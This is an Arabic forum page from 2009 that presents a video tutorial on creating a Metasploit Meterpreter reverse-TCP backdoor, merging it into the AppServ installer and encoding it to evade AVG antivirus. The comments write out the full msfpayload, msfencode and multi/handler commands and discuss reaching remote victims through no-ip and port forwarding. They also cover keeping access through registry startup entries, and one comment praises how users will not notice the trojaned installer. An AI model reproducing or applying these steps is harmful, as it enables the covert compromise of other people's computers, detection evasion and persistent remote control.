| فيديو: دمج وتشفير backdoor باستخدام ميتاسبلويت لتخطي حماية AVG |
| الكاتب عبد العزيز حسن |
| الثلاثاء, 29 ديسمبر 2009 16:23 |
|
فيديو يشرح استخدام مشروع ميتاسبلويت لصنع ودمج meterpreter backdoor باستخدام الأداة msfpayload وتشفيره باستخدام msfencode لتخطي حماية برنامج AVG Internet Security واختراق نظام ويندوز عن طريق الاتصال العكسي.
الفيديو:
التعليقات (27)
  أرسلت بواسطة: احمد الحربي في December 30, 2009
صراحه شرح ابداع و اكثر من مفهوم ..
بس عندي سؤال .. الطريقه هاذي تشتغل على كل جدار ناري ؟؟ و شكرا ..
 أرسلت بواسطة: عبد العزيز حسن في December 30, 2009
عبدالمهيمن::شكرا علي نشر الفديو اخيرا تم وضع فديو في الحقيقه اختيار برنامج الاباتشي لم يكن عبثا لان الفيرول الخاص بالوندوز لو لم يكن هناك اي فير ول خارجي سوف يقوم باخبارك بان البرنامج سوف يقوم بفتح منفذ والكل في الغالب بيوافق رغم انه لن يؤثر ذلك علي السرفر المحلي في العمل لو رفض فتح البورت لذلك اخترته ....كلامك 100% صحيح مشكور مرة اخري علي النشر وباذن الله الي المزيد تحياتي لك اخي العزيز
 أرسلت بواسطة: glal في December 30, 2009
فكره رائعة بس عندي سؤال ... هذه الطريقه للشبكه المحليه فقط ولا ممكن ان تطبق علي شبكه اخري غير شبكتك
أرسلت بواسطة: عبد العزيز حسن في December 30, 2009
احمد حربي::اعتقد انها تصلح مع كل الفير ول اللي بيستخدم تقنيه signature-based في الكشف عن تواقيع الفيروسات والباك دور
عبد المهيمن :: لي طلب لو تبعث لي الخلفيه التي تضعها في الشروحات لكي استخدمها في الشروحات القادمه باذن الله
 أرسلت بواسطة: Mr.Romance في December 30, 2009
يعطيك الف عافية على درس
واعجبتني فكرة وهي تصلح ايضا مع برامج اللي تستخدم خدمات فيها بورت ليس فقط مع appserver وفي انتظار جديدك دروسك
 أرسلت بواسطة: ابو عبد الرحمن في December 30, 2009
هل بامكاني ان اضع مكان LHOSI= حسابي على ال NO-IP بدل رقم الايبي
وهل يبقى جهاز الذي فتح الباك دور المدمج.. متصل معي دوما ..كلما فتح جهازه واتصل في الانترنت؟ وفقكم الله
 أرسلت بواسطة: oc في December 30, 2009
شكراً جزيلاً على الشرح الفريد من نوعه
بالنسبة لعملية اختيار ال Lhost عند انشاء ال Payload كان مختلف عنه عند عمل الأمر multihandler لعمل انتظار للاتصال "الأيبي مختلف في الشرح الذي قدمته إذا لاحظت ذلك" اظن انه لا تحتاج لادخال Lhost في عملية انتظار الاتصال بواسطة multihandler شكراً لك جزيلاً
 أرسلت بواسطة: mahmoud dradkeh في December 30, 2009
مشكور اخي صاحب الشرح ومشكورين على هلموقع الاكثر من راائع الصراحه
 أرسلت بواسطة: Mohammad AlQarni في December 30, 2009
مشكور أخي على الشرح
ولكن لو أستخدمت حقن المكتبات dll راح يتخطى الجدار الناري وأحتمال ما يتخطى في بعض الاجهزة على حسب الفايرول تحياتي لك
أرسلت بواسطة: عبد العزيز حسن في December 31, 2009
glal::الطريقه تنفع علي اي جهاز ولكن في حاله يكون الجهاز بعيد عنك هناك شويه شروط
1-يكون الاي بي خاصتك ثابت 2-فتح البورت المستخدم في الروتر الخاص بيك وفي الشرح هتفتح البورت 8080 Mr.Romance::كلامك صحيح يا حبيبي مع اي برنامج يعمل علي الانترنت الياهو الهوتميل الفير فوكس كلها برامج سوف تعطي للمستخدم حق الوصول للانترنت لن تعمل في حاله عدم السماح ليها ولذلك سوف يسمح المستخدم له طوعا ابو عبد الرحمن::ايوة يمكنك ذلك ولكن يجب فتح البروت 8080 لكي تستطيع اكمل الاختراق بشكل سليم لا لن تسطيع ذلك ولكن يمكنك التعديل علي الرجستري مثلا ووضع الباكدور في بدء الاقلاع وتخترق الجهاز كل ما يعمل ريستارت او مثلا رفع ملف باتش oc::مختلف لاني استخدم الاداه msfcli في تشغيل multi/handler وليس من msfconsole ووضعت كافه الخيارات في سطر واحد كما ان عمليه التشفير جلعتني اضيف نوع التشفير علي انه payload mahmoud dradkeh::شكرا علي المرور Mohammad AlQarni::كلامك صحيح ولكن كما قلت علي حسب الفيرول
أرسلت بواسطة: oc في December 31, 2009
في الشرح قمت بتحديد قيمة LHost=192.168.100.42
عند عمل ال paylod ثم عند انتظار الاتصال العكسي قمت بتحديد قيمة Lhost=192.168.10.42 مرة اخرى لم افهم لماذا الاختلاف؟ بغض النظر عن ادخال الامر في سطر واحد بطريقة Piping عند انشاء ال payload في البداية
 أرسلت بواسطة: خاش عرض في December 31, 2009
شكرا على الفيديو
بس عندي استفسار كيف تم الاتصال والاي بي مختلف http://www.up-00.com/h2files/l9v60917.gif
 أرسلت بواسطة: عبد الصمد في December 31, 2009
لا أدري إذا كان صاحب الشرح قد تعمد إرتكاب الخطأ أم لا لكني سأوضح...
1-أمر توليد و تشفير البايلود كان صحيحا 2-أمر التنصت كان فيه خطأفيه lhost من المفروض تكتب بال capitalيعني LHOST= و لهذا الميتاسبلويت لم يأخذ بعين الإعتبار هذا الخطأ و إعتبر كأن الأمر لم يكن فيه lhost و لهذا سيأخذ الأيبي حق الجهاز المهاجم يعني إفتراضيا مما يفسر نجاح الإستغلال خلاصة القول ./msfcli multi/handler PAYLOAD=some_payload سيأخذ إفتراضا LHOST=your_ip
أرسلت بواسطة: عبد العزيز حسن في December 31, 2009
oc::كلامك صحيح يا اخي خطأ سهو مني في الشرح ولكن لان التطبيق علي جهاز وهمي ولم افعل Bridged فبالتالي يعتبر انا بعمل علي نفس الجهاز لذلك لم يحدث خطا في الاستغلال ولكن لو كنت مفعل الخاصيه Bridged او بطبق علي جهاز حقيقي معي في الشبكه لن ينفع الاستغلال
خاش::نفس الرد السابق عبد الصمد::كلامك ليس صحيح يا اخي عبد الصمد جرب تعملها small و سوف تعمل بنجاح وذلك لانك بتسند للقيمه payload نوع التشفير وتسند لها ايضا نوع الشل كود الخاص بيك ------------- واسف علي الخطأ في الشرح باذن الله سوف اراعي الدقه اكثر المرة القادمه رغم اني مصور هذا الشرح اكثر من 10 مرات وكل مرة الغي الفديو واعيد من جديد عموما باذن الله ساراعي هذا في الدروس القادمه
أرسلت بواسطة: عبد الصمد في December 31, 2009
أنت تقول أننا نسند نوع التشفير و نوع الشل كود للقيمة payload
لكن لا توجد علاقة مع lhost سأعطيك دليل نجح الإتصال مع أنك أدخلت أيبي خاطيء في رأيك لماذا؟ هي صحيح أنك لما تدخل البيانات بال small تنجح لكن بالنسبة لل lhost لن تعمل لأنه سيحاول أن يعمل bind مع ايبي غير الأيبي حقك و هذا غير منطقي طبعا لهذا قام بالتغيير و عمل bind للبورت 8080 بالنسبة للأيبي الصحيح بتاعك. ملاحظة أخرى: الفرق بين small و big هو أنه لما تعمل small سيقوم بالتحقق من أن الأيبي الذي أدخلته صحيح فإذا كان العكس يصحح بنفسه الأمر و يتنصت بالأيبي الحقيقي أما إذا أدخلت LHOST بال big فهنا توضح أنك تؤكد ذلك و لا يعمل تحقيق للتصحيح أرجو أنك فهمتني
أرسلت بواسطة: عبد العزيز حسن في December 31, 2009
عبد الصمد::اخي هل راجعت الرد السابق كله ؟؟؟ لو لاحظت انا قلت لاني لم اعمل Bridged للجهاز الوهمي فلذلك هو يعتبر شغال علي نفس الجهاز يعني بالمعني الصحيح الضحيه والمخترق بنفس الاي بي لذلك لم يحدث الخطأ عند الاتصال ارجوا تكون فهمت النقطه هذة ..
من قال هذا يا حبيبي انا لم اعمل اتصال bind انا عملت reverse اتصال عكسي لو عملت اتصال عادي كانت القيم هتختلف بمعني انك سوف تضع RHOST ,RPORT وفي هذة الحاله سوف تضع اي بي الضحيه وليس اي بي جهازك وتضع البورت المفتوح في الضحيه وليس في جهازك ... اخي هل جربت الشرح ؟؟؟ جربه small وتاكد من الاي بي وسوف تعمل بنجاح فلا تعاند وانت لم تجرب جرب واذا لم تفلح في التجربه تعالي الي النقاش لانك في هذا الوقت سوف تكون جربت وفشلت وفي هذة الحاله سوف يكون النقاش هادف . اسف علي كلامي يا حبيبي ولكن الاختلاف في الرائ يجب ان يكون لديك اثبات ان الطريقه لا تعمل وليس الرفض لمجرد الرفض فقط
أرسلت بواسطة: عبد الصمد في December 31, 2009
لم تفهم قصدي من كلمة bind
أنا قصدتها bind port بمعنى أن البورت يفتح في جهاز المهاجم و هذا هو مبدأ الإتصال العكسي يعني نفتح بورت و نتنصت عليه و الضحية يتصل عندنا عكس bind connection ثانيا بالنسبة للشرح أنا مطبقه من قبل و سأقول لك النتيجة: -أنا عامل Bridged و لما أعمل تنصت بإستخدام LHOST=192.168.1.2 اللي هو الأيبي حقي يحدث إتصال, أوكي حتى هنا تمام -لما أعمل تنصت بإستخدام lhost=192.168.100.200 يحدث إتصال أيضا و هذا ما يثبت ما قلته سابقا حتى لو وضعت مثلا lhost=www.google.com سينجح لأنه كما قلت سيتحقق و يعمل تنصت من الأيبي الحقيقي
 أرسلت بواسطة: مغرور هآكر في January 02, 2010
السلام عليكم آستاذي اولا اشكرك ع الشرح الرائع اعجبني اسلوبك الذكي واختيارك للبرنامج
بالذات ولكن حصلت معي مشكلة قبل ماطرح مشكلتي هل هنالك طرق اخرى لتشفير الملفات التنفيذية على سبيل المثال برنامج او ماشابه ؟؟ ثانيا استاذي عندما حاولت البدأ بالتشفير ظهرت لي هذه المشكلة [-] No encoders succeeded. عند هذه الخطوة بالضبط /msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8080 R | ./msfencode -t exe -x /root/pro1.exe -o /root/pro2.exe -e x86/shikata_ga_mai -c 5 بانتظارك استاذي شكرا لك ..
 أرسلت بواسطة: Fitouhi Med Ali في January 03, 2010
payload=x86/shikata_ga_mai
اعتقد ان هذا الامر خطا و لكل من يسال عن الاختراق خارج الشبكة افتح بورت التي وضعتها في البايلود او استخدم vpn و الاي بي ضع الاي بي الخارجي www.adress-ip.com و بالنسبة الي ضياع الاي بي توجد اوامر في الميتا تجعل الاي بي مثبت او قم بتثبيت برنامج تثبيت الاي بي
 أرسلت بواسطة: عبدالمهيمن في January 03, 2010
بخصوص payload=x86/shikata_ga_mai عند استخدام multi hander فكما قال الأخ Fitouhi هو خاطئ لكن ميتاسبلويت لم يظهر رسالة خطأ لأن الأخ عبد العزيز حدد الـ payload الصحيح بعده.
الأمر الذي تم تنفيذه في الشرح هو: ./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=192.168.10.42 lport=8080 payload=windows/meterpreter/reverse_tcp E ميتاسبلويت تجاهل: payload=shikata_ga_nai لأن الأخ عبدالعزيز عاد وحدد الـ payload مرة ثانية بعده: payload=windows/meterpreter/reverse أما بالنسبة لقيمة lhost فهي مطلوبة عند استخدام الـ payload في ثغرة أو صنع باك دوور يقوم باتصال عكسي لمعرفة الجهاز الذي سيتم الاتصال به, عند استخدام multi handler لن يكون لـ LHOST قيمة لأنها محددة في الـ backdoor ومهمة الـ multi handler هي استقبال الاتصال العكسي بعد تحديد المنفذ والستغلال المستخدم. الأمر النهائي بعد التصحيح سيصبح: ./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.100.42 lport=8080 E مرة أخرى شكراً للأخ عبد العزيز على الشرح وشكراً للجميع لتوضيح الأخطاء الموجودة.. هذا أمر عادي ويحصل مع الجميع خصوصاً في شروحات الفيديو :)
 أرسلت بواسطة: LPT في January 05, 2010
http://www.offensive-security....-unleashed
> Ch.12: MSF Extended Usage > Backdooring EXE Files [whisper] Your English speaking is TERRIBL
 أرسلت بواسطة: 0_0 في January 06, 2010
انا استخدم شبكة داخليه my ip = 192.168.1.7 و عندي حساب no-ip و الروتر مفتوح للبورت 80
فهل استطيع عمل (الباك دور) ليفتح البورت 80 (lport=80) و الهوست على حسابي بال no-ip مثلا (lhost=wwwmyaccount.no-ip.info) حيث انا عامل (ري دايريكت) من هذا العنوان الى ال ip تبعي وهو 192.168.1.7 فبذلك ترجع البكج من الموقع الى ال ip تبعي!! فهل هذا ممكن؟؟ ارجو الاجابه لمن عنده الحل علما اني لم اجرب الطريقه بعد واريد التاكد والف شكر يا استاذ
أرسلت بواسطة: عبدالمهيمن في January 06, 2010
لماذا لا تجرب الطريقة وتعطنا النتائج؟ لماذا تنتظر غيرك ليجرب ويشرح لك؟
حاول أن تعتمد على نفسك ثم شارك ما تعلمت :) وبالمناسبة لا أعلم لماذا الجميع يريد استخدام no-ip!! هل تعتقدوا أن metasploit مناسب لاستخدامه مثل برنامج Brifost مثلا!!!
أرسلت بواسطة: 0_0 في January 07, 2010
اخي عبد المهيمن انا لا اعتقد ان ال META مناسب لاستخدامات محددة فقط ولكن هو مناسب على قدر
ابداعك به وفهمك له وكل استخدام جائز مادام يوصلك الى النتيجه المطلوبه ؟؟ سوف احاول تجربه العمليه لاهميتها حيث يتمكن المهاجم من شبكه داخليه مهاجمة شبكه داخليه اخرى !! واذا حصلت على نتائج طيبه ساشاركها لتعم الفائده.. والف شكر يا اخي عبد المهيمن .
أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |
بالنسبة للفايروول في AVG فلقد اكتشف أن الملف الناتج يحاول الاتصال مع IP خارجي عند تشغيله لكن فكرة دمجة مع السيرفر المحلّي appserv ذكيّة لأن appserv أثناء التنصيب سيقوم بفتح منفذ بالجهاز وبالعادة برنامج الحماية يعطي تحذير وبهذه الحالة ممكن تنطلي الحيلة على المستخدم وما يشعر أن appserv مدموج مع باك دوور خصوصاً أن الأنتي فايروس لم يعطي تنبيه و 99% من مستخدمي نظام ويندوز يعتقدون أن برامج الحماية هي الحل النهائي لحماية أجهزتهم من الاختراق!